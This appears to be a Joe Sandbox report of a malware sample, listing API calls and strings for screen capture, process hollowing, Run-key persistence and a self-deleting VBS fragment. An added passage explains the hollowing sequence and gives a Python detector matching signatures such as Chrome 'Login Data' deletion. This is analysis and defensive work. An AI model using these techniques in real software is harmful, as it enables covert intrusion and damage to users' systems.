                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID:
                                      • API String ID: 745075371-0
                                      • Opcode ID: 2b69b0f59721baab3e2573dba9c727c81156e89ebef71af82108b258dbaf8bd0
                                      • Instruction ID: 46050f183c826812caf45b9ccae71906afa4216e0e25e06b98da67faf93c562d
                                      • Opcode Fuzzy Hash: 2b69b0f59721baab3e2573dba9c727c81156e89ebef71af82108b258dbaf8bd0
                                      • Instruction Fuzzy Hash: E3513B71940226AEEF20DBA4DD84BBBB7B9EF18700F140469ED15EB190EF70D945CBA1
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02A08811
                                      • FindFirstFileW.KERNEL32(00000000,?,02A66608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A088CA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A088F2
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A088FF
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A08A15
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                      • String ID:
                                      • API String ID: 1771804793-0
                                      • Opcode ID: 44c4486b6fba4170be9070b47d2b532270d3d588f31d0b72881e1ad2f370da6d
                                      • Instruction ID: 7415ca92596acf0e0d15da70bd594ef678ac3192be0bea509d1b880a706fd05b
                                      • Opcode Fuzzy Hash: 44c4486b6fba4170be9070b47d2b532270d3d588f31d0b72881e1ad2f370da6d
                                      • Instruction Fuzzy Hash: 33517472D40209AADF04FB64EED99EE777AAF14344F40055AA80AA70D1EF349B48CF95
                                      APIs
                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02A1CAD7
                                        • Part of subcall function 02A1376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,02A6611C), ref: 02A1377E
                                        • Part of subcall function 02A1376F: RegSetValueExA.ADVAPI32(02A6611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,02A1CAB1,WallpaperStyle,02A6611C,00000001,02A74EE0,00000000), ref: 02A137A6
                                        • Part of subcall function 02A1376F: RegCloseKey.ADVAPI32(02A6611C,?,?,02A1CAB1,WallpaperStyle,02A6611C,00000001,02A74EE0,00000000,?,02A0875D,00000001), ref: 02A137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateInfoParametersSystemValue
                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                      • API String ID: 4127273184-3576401099
                                      • Opcode ID: 383bdf55e7825feaea9a939fa1418fb8bee7a56fb7090a7655f51f647d2c0757
                                      • Instruction ID: f6fe4da37d9eebcfe4b1541b09410312680ee9971639b7801350c56c3e77b454
                                      • Opcode Fuzzy Hash: 383bdf55e7825feaea9a939fa1418fb8bee7a56fb7090a7655f51f647d2c0757
                                      • Instruction Fuzzy Hash: C5114AA2FC031073F819753D0E6FF7E2A17A742B70F84019BEA422A6C6DE870A5446D3
                                      APIs
                                        • Part of subcall function 02A48215: GetLastError.KERNEL32(?,02A3F720,02A3A7F5,02A3F720,02A74EF8,?,02A3CE15,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48219
                                        • Part of subcall function 02A48215: _free.LIBCMT ref: 02A4824C
                                        • Part of subcall function 02A48215: SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A4828D
                                        • Part of subcall function 02A48215: _abort.LIBCMT ref: 02A48293
                                      • IsValidCodePage.KERNEL32(00000000), ref: 02A51DBA
                                      • _wcschr.LIBVCRUNTIME ref: 02A51E4A
                                      • _wcschr.LIBVCRUNTIME ref: 02A51E58
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 02A51EFB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID:
                                      • API String ID: 4212172061-0
                                      • Opcode ID: c29151d1d40c886fe1c38aba5e403513724848e420118a40a3e21ffa19559454
                                      • Instruction ID: c9e7eb80a178110969bb2b8852e52dc7458e59f87cd1e42caa130b9b123125b2
                                      • Opcode Fuzzy Hash: c29151d1d40c886fe1c38aba5e403513724848e420118a40a3e21ffa19559454
                                      • Instruction Fuzzy Hash: E761F576640726AADB24AB34DD81FBB73A9EF04714F14046AED0DDB580EF74E944CBA0
                                      APIs
                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02A18E90
                                      • CreateCompatibleDC.GDI32(00000000), ref: 02A18E9D
                                        • Part of subcall function 02A19325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 02A19355
                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 02A18F13
                                      • DeleteDC.GDI32(00000000), ref: 02A18F2A
                                      • DeleteDC.GDI32(00000000), ref: 02A18F2D
                                      • DeleteObject.GDI32(00000000), ref: 02A18F30
                                      • SelectObject.GDI32(00000000,00000000), ref: 02A18F51
                                      • DeleteDC.GDI32(00000000), ref: 02A18F62
                                      • DeleteDC.GDI32(00000000), ref: 02A18F65
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 02A18F89
                                      • GetIconInfo.USER32(?,?), ref: 02A18FBD
                                      • DeleteObject.GDI32(?), ref: 02A18FEC
                                      • DeleteObject.GDI32(?), ref: 02A18FF9
                                      • DrawIcon.USER32(00000000,?,?,?), ref: 02A19006
                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 02A1903C
                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 02A19068
                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 02A190D5
                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 02A19144
                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A19168
                                      • DeleteDC.GDI32(?), ref: 02A1917C
                                      • DeleteDC.GDI32(00000000), ref: 02A1917F
                                      • DeleteObject.GDI32(00000000), ref: 02A19182
                                      • GlobalFree.KERNEL32(?), ref: 02A1918D
                                      • DeleteObject.GDI32(00000000), ref: 02A19241
                                      • GlobalFree.KERNEL32(?), ref: 02A19248
                                      • DeleteDC.GDI32(?), ref: 02A19258
                                      • DeleteDC.GDI32(00000000), ref: 02A19263
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                      • String ID: DISPLAY
                                      • API String ID: 479521175-865373369
                                      • Opcode ID: 303bf3f9208b9b6da950b2d95d75200afff559bec34b4f8bd40fc42a1bf7fd0e
                                      • Instruction ID: 8f5fdf9ab77d5a36cb16cbcace590ae10aa09cf7317b4a54801aaef263668351
                                      • Opcode Fuzzy Hash: 303bf3f9208b9b6da950b2d95d75200afff559bec34b4f8bd40fc42a1bf7fd0e
                                      • Instruction Fuzzy Hash: 82C13A71548351AFE724DF24D988B6BBBE9EF88750F00481DF98997290DF34E905CBA2
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 02A18136
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A18139
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 02A1814A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1814D
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 02A1815E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A18161
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 02A18172
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A18175
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02A18217
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02A1822F
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 02A18245
                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02A1826B
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02A182ED
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 02A18301
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02A18341
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02A1840B
                                      • SetThreadContext.KERNEL32(?,00000000), ref: 02A18428
                                      • ResumeThread.KERNEL32(?), ref: 02A18435
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02A1844C
                                      • GetCurrentProcess.KERNEL32(?), ref: 02A18457
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 02A18472
                                      • GetLastError.KERNEL32 ref: 02A1847A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                      • API String ID: 4188446516-3035715614
                                      • Opcode ID: e8ea1b6d1cbf9396427ec5a27ba0e9ad48769a245d5515d942f207edbde2dd0a
                                      • Instruction ID: 2bf3b6b2c22790addb8551eda043a0fe0dd77f0a7c6eb6f9307490b4a0ad43ce
                                      • Opcode Fuzzy Hash: e8ea1b6d1cbf9396427ec5a27ba0e9ad48769a245d5515d942f207edbde2dd0a
                                      • Instruction Fuzzy Hash: 59A14AB0A44301EFEB108F64DC89B6BBBE8FB48718F04082AF695D6191DF74E815CB56
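The block above has the API shape of process hollowing: CreateProcessW with dwCreationFlags 0x00000004 (CREATE_SUSPENDED), GetThreadContext on the suspended primary thread, a 4-byte ReadProcessMemory/WriteProcessMemory pair (consistent with reading and then patching the image-base pointer in the child's PEB; that reading is an interpretation, not something the report states), SetThreadContext and ResumeThread, with ZwCreateSection/ZwMapViewOfSection/ZwUnmapViewOfSection resolved at run time through GetProcAddress so the payload can be mapped as a section rather than written with VirtualAllocEx. The Python below is an added illustration, not code from Joe Sandbox or from the sample: it parses the report's own "Api.MODULE(args), ref:" bullet lines and matches each function listing against a few behaviour signatures. The signature labels, the helper names and the two embedded listings (copied from the function blocks on this page and labelled as constructed input) are this example's own choices; the constants CREATE_SUSPENDED = 0x4 and SPI_SETDESKWALLPAPER = 0x14 are the documented Win32 values.

```python
"""Classify a Joe Sandbox per-function API listing against a handful of
behaviour signatures.  Added example: the signatures, helper names and
the two sample listings are this example's own, not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import Callable, FrozenSet, List, Optional, Tuple

# One "• Api.MODULE(args), ref: ADDR" bullet, optionally prefixed with
# "Part of subcall function XXXX:".  Calls printed without an argument
# list ("GetLastError.KERNEL32 ref: ...") are accepted as well.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

CREATE_SUSPENDED = 0x00000004     # CreateProcess dwCreationFlags bit
SPI_SETDESKWALLPAPER = 0x0014     # SystemParametersInfo uiAction


@dataclass(frozen=True)
class Call:
    name: str
    module: str
    args: Tuple[str, ...]         # raw tokens: hex, "?" or a string
    ref: str
    subcall: Optional[str]        # callee address when nested, else None


def parse_calls(listing: str) -> List[Call]:
    """Extract the API bullets; Strings, hashes and headers are ignored."""
    calls: List[Call] = []
    for line in listing.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m["args"] or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"]))
    return calls


def hex_arg(call: Call, index: int) -> Optional[int]:
    """Argument `index` as an integer; None for "?" or string arguments."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


Predicate = Callable[[List[Call]], bool]


def arg_has_flag(api: str, index: int, flag: int) -> Predicate:
    return lambda calls: any(c.name == api and (hex_arg(c, index) or 0) & flag
                             for c in calls)


def arg_equals(api: str, index: int, value: int) -> Predicate:
    return lambda calls: any(c.name == api and hex_arg(c, index) == value
                             for c in calls)


def arg_contains(api: str, needle: str) -> Predicate:
    return lambda calls: any(c.name == api and any(needle in a for a in c.args)
                             for c in calls)


# (label, APIs that must all be present, extra argument check); the labels
# are this example's wording, not Joe Sandbox signature names.
SIGNATURES: List[Tuple[str, FrozenSet[str], Predicate]] = [
    ("process hollowing: CREATE_SUSPENDED child, context swap, ResumeThread",
     frozenset({"CreateProcessW", "GetThreadContext", "WriteProcessMemory",
                "SetThreadContext", "ResumeThread"}),
     arg_has_flag("CreateProcessW", 5, CREATE_SUSPENDED)),
    ("section-mapping primitives (Zw*Section) resolved at runtime",
     frozenset({"GetModuleHandleA", "GetProcAddress"}),
     arg_contains("GetModuleHandleA", "ZwMapViewOfSection")),
    ("shutdown/logoff: SeShutdownPrivilege enabled, then ExitWindowsEx",
     frozenset({"LookupPrivilegeValueA", "AdjustTokenPrivileges", "ExitWindowsEx"}),
     arg_contains("LookupPrivilegeValueA", "SeShutdownPrivilege")),
    ("Chrome Login Data deleted",
     frozenset({"DeleteFileA"}), arg_contains("DeleteFileA", "Login Data")),
    ("wallpaper replaced via registry and SPI_SETDESKWALLPAPER",
     frozenset({"SystemParametersInfoW", "RegSetValueExA"}),
     arg_equals("SystemParametersInfoW", 0, SPI_SETDESKWALLPAPER)),
    ("screen capture through GDI",
     frozenset({"CreateDCA", "CreateCompatibleBitmap", "BitBlt", "GetDIBits"}),
     arg_contains("CreateDCA", "DISPLAY")),
]


def classify(listing: str, include_subcalls: bool = True) -> List[str]:
    """Labels of every signature the listing satisfies, in SIGNATURES order."""
    calls = parse_calls(listing)
    if not include_subcalls:
        calls = [c for c in calls if c.subcall is None]
    present = {c.name for c in calls}
    return [label for label, required, check in SIGNATURES
            if required <= present and check(calls)]


# Constructed input: bullet lines copied from two function blocks of this report.
HOLLOWING_LISTING = """\
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 02A18136
• GetProcAddress.KERNEL32(00000000), ref: 02A18139
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 02A1814A
• GetProcAddress.KERNEL32(00000000), ref: 02A1814D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02A18217
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02A1822F
• GetThreadContext.KERNEL32(?,00000000), ref: 02A18245
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02A1826B
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02A1840B
• SetThreadContext.KERNEL32(?,00000000), ref: 02A18428
• ResumeThread.KERNEL32(?), ref: 02A18435
• GetLastError.KERNEL32 ref: 02A1847A
"""

SHUTDOWN_LISTING = """\
  • Part of subcall function 02A17952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02A17978
  • Part of subcall function 02A17952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02A17997
• ExitWindowsEx.USER32(00000000,00000001), ref: 02A16856
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02A1686B
"""

if __name__ == "__main__":
    for name, text in (("hollowing", HOLLOWING_LISTING), ("shutdown", SHUTDOWN_LISTING)):
        print(name, classify(text), "without subcalls:", classify(text, False))
```

Two points the output makes visible: the privilege calls in the shutdown block live in a callee (02A17952), so a matcher that drops "Part of subcall function" lines misses that signature, and the hollowing match rests on the dwCreationFlags argument, not on API names alone, since GetThreadContext/SetThreadContext also appear in benign debuggers.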
                                      APIs
                                        • Part of subcall function 02A12850: TerminateProcess.KERNEL32(00000000,?,02A0D80F), ref: 02A12860
                                        • Part of subcall function 02A12850: WaitForSingleObject.KERNEL32(000000FF,?,02A0D80F), ref: 02A12873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 02A0D51D
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02A0D530
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 02A0D549
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 02A0D579
                                        • Part of subcall function 02A0B8AC: TerminateThread.KERNEL32(02A0A27D,00000000,00000000,?,02A0D442,?,00000000), ref: 02A0B8BB
                                        • Part of subcall function 02A0B8AC: UnhookWindowsHookEx.USER32(02A750F0), ref: 02A0B8C7
                                        • Part of subcall function 02A0B8AC: TerminateThread.KERNEL32(02A0A267,00000000,?,02A0D442,?,00000000), ref: 02A0B8D5
                                        • Part of subcall function 02A1C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,02A1C510,00000000,00000000,00000000), ref: 02A1C430
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02A66468,02A66468,00000000), ref: 02A0D7C4
                                      • ExitProcess.KERNEL32 ref: 02A0D7D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                      • API String ID: 1861856835-1536747724
                                      • Opcode ID: 9113c71068816f9d61ddaf8bf18fbb971bb3dc7614c1029e39de4ca6b468135a
                                      • Instruction ID: 22d89e825e0c9b512591bb0be878cb2836d4ff1a1e160156efe4783f8d85d8f2
                                      • Opcode Fuzzy Hash: 9113c71068816f9d61ddaf8bf18fbb971bb3dc7614c1029e39de4ca6b468135a
                                      • Instruction Fuzzy Hash: 5F9192216843005AD715FB60FDD4AEFB3AAEF95714F40082FA54A931E1EF609D0DCE96
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,02A750E4,00000003), ref: 02A12494
                                      • ExitProcess.KERNEL32(00000000), ref: 02A124A0
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02A1251A
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02A12529
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A12534
                                      • CloseHandle.KERNEL32(00000000), ref: 02A1253B
                                      • GetCurrentProcessId.KERNEL32 ref: 02A12541
                                      • PathFileExistsW.SHLWAPI(?), ref: 02A12572
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 02A125D5
                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 02A125EF
                                      • lstrcatW.KERNEL32(?,.exe), ref: 02A12601
                                        • Part of subcall function 02A1C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,02A1C510,00000000,00000000,00000000), ref: 02A1C430
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02A12641
                                      • Sleep.KERNEL32(000001F4), ref: 02A12682
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02A12697
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A126A2
                                      • CloseHandle.KERNEL32(00000000), ref: 02A126A9
                                      • GetCurrentProcessId.KERNEL32 ref: 02A126AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                      • String ID: .exe$WDH$exepath$open$temp_
                                      • API String ID: 2649220323-3088914985
                                      • Opcode ID: 77353debb35888e22508bcf1f91ff48c1c7357c856978553372a6c97195b0e04
                                      • Instruction ID: b4861ec62b2ac00a9513d55f1acb33a49011ed233be1cb4ef299cc965fe8efc2
                                      • Opcode Fuzzy Hash: 77353debb35888e22508bcf1f91ff48c1c7357c856978553372a6c97195b0e04
                                      • Instruction Fuzzy Hash: CF518671E80325ABDF10A7A0ADD9BFF736EAB44720F400596F916A71C0DF748E46CA94
                                      APIs
                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 02A1B13C
                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 02A1B150
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02A660A4), ref: 02A1B178
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,02A74EE0,00000000), ref: 02A1B18E
                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 02A1B1CF
                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 02A1B1E7
                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 02A1B1FC
                                      • SetEvent.KERNEL32 ref: 02A1B219
                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 02A1B22A
                                      • CloseHandle.KERNEL32 ref: 02A1B23A
                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 02A1B25C
                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 02A1B266
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                      • API String ID: 738084811-1354618412
                                      • Opcode ID: f79e2411667b2f040bc15f55c650752c0c51799af99523fd5810ab5f5602a0fa
                                      • Instruction ID: 77bd611cb416086f1822b2dc695f24c83a2a5ef7bd83cd7d58b0eb5a68dfd667
                                      • Opcode Fuzzy Hash: f79e2411667b2f040bc15f55c650752c0c51799af99523fd5810ab5f5602a0fa
                                      • Instruction Fuzzy Hash: 9E5193716C43056EE315B770EDD9EBF77AEEB84368F00081AB54A861D0EF608D19CE66
                                      APIs
                                        • Part of subcall function 02A12850: TerminateProcess.KERNEL32(00000000,?,02A0D80F), ref: 02A12860
                                        • Part of subcall function 02A12850: WaitForSingleObject.KERNEL32(000000FF,?,02A0D80F), ref: 02A12873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,02A752F0,?,pth_unenc), ref: 02A0D1A5
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02A0D1B8
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,02A752F0,?,pth_unenc), ref: 02A0D1E8
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02A752F0,?,pth_unenc), ref: 02A0D1F7
                                        • Part of subcall function 02A0B8AC: TerminateThread.KERNEL32(02A0A27D,00000000,00000000,?,02A0D442,?,00000000), ref: 02A0B8BB
                                        • Part of subcall function 02A0B8AC: UnhookWindowsHookEx.USER32(02A750F0), ref: 02A0B8C7
                                        • Part of subcall function 02A0B8AC: TerminateThread.KERNEL32(02A0A267,00000000,?,02A0D442,?,00000000), ref: 02A0B8D5
                                        • Part of subcall function 02A1B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02A0407C), ref: 02A1B99F
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02A66468,02A66468,00000000), ref: 02A0D412
                                      • ExitProcess.KERNEL32 ref: 02A0D419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                      • API String ID: 3797177996-3018399277
                                      • Opcode ID: 195fa7f95848766eb6471f07aa495a4a95b25758e2573a333424d8da2eae266d
                                      • Instruction ID: 88c6a7805d0196ad3ca943939ea28f581464540aaf99917d707ad2aa57c7f4b1
                                      • Opcode Fuzzy Hash: 195fa7f95848766eb6471f07aa495a4a95b25758e2573a333424d8da2eae266d
                                      • Instruction Fuzzy Hash: E881A1216843006BD715FB60FEE49EFB3AAAF95704F50082EA54A971D1EF609D0DCE92
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02A01AD9
                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 02A01B03
                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 02A01B13
                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 02A01B23
                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 02A01B33
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02A01B43
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02A01B54
                                      • WriteFile.KERNEL32(00000000,02A72AAA,00000002,00000000,00000000), ref: 02A01B65
                                      • WriteFile.KERNEL32(00000000,02A72AAC,00000004,00000000,00000000), ref: 02A01B75
                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 02A01B85
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02A01B96
                                      • WriteFile.KERNEL32(00000000,02A72AB6,00000002,00000000,00000000), ref: 02A01BA7
                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 02A01BB7
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02A01BC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Write$Create
                                      • String ID: RIFF$WAVE$data$fmt
                                      • API String ID: 1602526932-4212202414
                                      • Opcode ID: 5a46f387758b422e82a29643042ffddd8f3090459553bf290a9198c8d49a521d
                                      • Instruction ID: 72a0dbc885598f60f839230302a080b805bb8c6c44dccac8bd863ec4c5e3e943
